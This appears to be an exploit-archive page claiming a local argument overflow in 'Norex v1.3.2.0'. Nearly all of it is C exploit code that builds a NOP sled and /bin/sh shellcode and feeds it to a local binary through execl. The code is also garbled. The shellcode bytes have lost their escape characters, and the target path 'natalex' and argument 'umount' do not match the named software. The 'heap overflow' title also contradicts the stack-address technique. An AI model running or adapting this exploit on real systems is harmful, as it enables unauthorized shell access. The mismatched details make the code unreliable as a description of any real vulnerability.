Norex v1.3.2.0 Argument Heap-Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Norex v1.3.2.0 Argument Heap-Overflow
# Published : 2010-06-22
# Author : GoteGELENZI
# Previous Title : BlazeDVD v6 (.plf) SEH universale Buffer Overflow
# Next Title : MoreAmp (.maf) local Stack Buffer Overflow (SEH) (calc)

# Author: SiktirEdenzi aka GoteGELENZI
# Software Link: http://www.muratkaslioglu.com/norex/
# Version: v1.3.2.0
# Tested on: Linux
# CVE :
# Code :


#define PATH_ZEN "/usr/bin/natalex -r"
#define OFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
"xb8x1bx56x34x12x62x1fx74x1fx6ex20x62x65x79x61x7a"
"x20x1fx61x70x6bx61x6cx61x72x20x61x6ex61x6ex1fx7a"
"x1fx20x73x69x6bx65x6ex7ax69x2cx20x68x75x7ax65x79"
"x66x65x20x73x65x6cx61x6dx6cx61x72x20x64x6fx73x74"
"x75x6dx20x6cx6fx6cx27x64x35x10x56x34x12x8dx4ex0b"
"x8bxd1xcd"
"x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memoryn");
exit(0);
}
ptr = buff;


memset(ptr, 0x90, OFFER_SIZE-strlen(execshell));
ptr += OFFER_SIZE-strlen(execshell);



for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
execl(PATH_ZEN, "umount", buff, NULL);
}